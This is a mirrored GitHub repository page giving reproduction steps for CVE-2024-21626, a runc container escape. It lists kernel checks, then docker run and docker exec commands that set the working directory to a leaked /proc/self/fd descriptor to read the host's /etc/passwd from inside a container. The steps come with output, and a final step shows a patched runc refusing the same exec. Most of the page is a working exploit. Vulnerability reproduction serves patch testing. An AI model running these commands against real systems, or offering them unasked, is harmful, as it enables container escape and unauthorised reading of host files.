Giters

zhangguanzhang / CVE-2024-21626

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

about

Steps to reproduce

ensure kernal >= (5.4,4.19,..) and there is openat2 in /proc/kallsyms. v1.0.0-rc93<= runc <=1.1.11

$ grep openat2 /proc/kallsyms
ffffffffa64290d0 T __pfx___audit_openat2_how
ffffffffa64290e0 T __audit_openat2_how
ffffffffa666de90 t __pfx_do_sys_openat2
ffffffffa666dea0 t do_sys_openat2
ffffffffa666e020 t __pfx___do_sys_openat2
ffffffffa666e030 t __do_sys_openat2
ffffffffa666e150 T __pfx___x64_sys_openat2
ffffffffa666e160 T __x64_sys_openat2
ffffffffa666e190 T __pfx___ia32_sys_openat2
ffffffffa666e1a0 T __ia32_sys_openat2
ffffffffa69871e0 T __pfx_io_openat2_prep
ffffffffa69871f0 T io_openat2_prep
ffffffffa6987280 T __pfx_io_openat2
ffffffffa6987290 T io_openat2
ffffffffa863d1e0 d event_exit__openat2
ffffffffa863d260 d event_enter__openat2
ffffffffa863d2e0 d __syscall_meta__openat2
ffffffffa863d320 d args__openat2
ffffffffa863d340 d types__openat2
ffffffffa8affb48 d __event_exit__openat2
ffffffffa8affb50 d __event_enter__openat2
ffffffffa8b02b18 d __p_syscall_meta__openat2
ffffffffa8b056f0 d _eil_addr___ia32_sys_openat2
ffffffffa8b05700 d _eil_addr___x64_sys_openat2

get host file:

$ tail -n1 /etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line ubuntu tail -n1 ../../../../../etc/passwd |& grep -Ev Error ; done
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false

get fd number

$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line -tid --name s-$line ubuntu   ; done
$ docker ps -a | grep -P 's-\d$'
c171e8ac9a1a  ubuntu    "bash"  About a minute ago   Up About a minute  s-7

number is 7 on my machine, and exec in old container:

$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false

after replace runc:

$ cp runc.amd64 /usr/bin/runc
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type

About